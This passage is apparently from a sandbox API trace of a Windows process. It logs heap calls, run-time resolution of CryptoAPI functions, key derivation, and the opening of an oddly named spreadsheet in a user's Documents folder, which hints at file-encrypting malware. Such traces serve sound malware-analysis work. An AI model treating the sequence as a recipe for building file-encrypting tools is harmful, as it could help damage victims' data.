Size=0x8) returned 0x2e55218 [0265.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551e8 [0265.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.572] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0265.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0265.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55148 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0265.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0265.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0265.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0265.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552c8 [0265.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d18 [0265.576] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51d18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.576] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552c8 | out: hHeap=0x970000) returned 1 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55288 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0265.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0265.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55288 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0265.577] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87550, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87090) returned 1 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0265.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.577] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ef8 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ef8 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e521b0 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52000 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52000 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e521b0 | out: hHeap=0x970000) returned 1 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52150 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52180 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e52018 [0265.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55168 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52018 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55168 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52180 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0265.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55148 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55158 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0265.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0265.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0265.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552a8 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55168 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55148 [0265.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0265.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0265.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.581] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0265.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.581] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699e8 [0265.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.582] CryptDestroyHash (hHash=0xa87550) returned 1 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.582] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0265.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.583] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.584] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/lC9iCEh8edFMc0F.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\lc9iceh8edfmc0f.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0265.584] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0265.584] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0265.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0265.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0265.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0265.585] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0265.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0265.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0265.585] PeekMessageW (in: 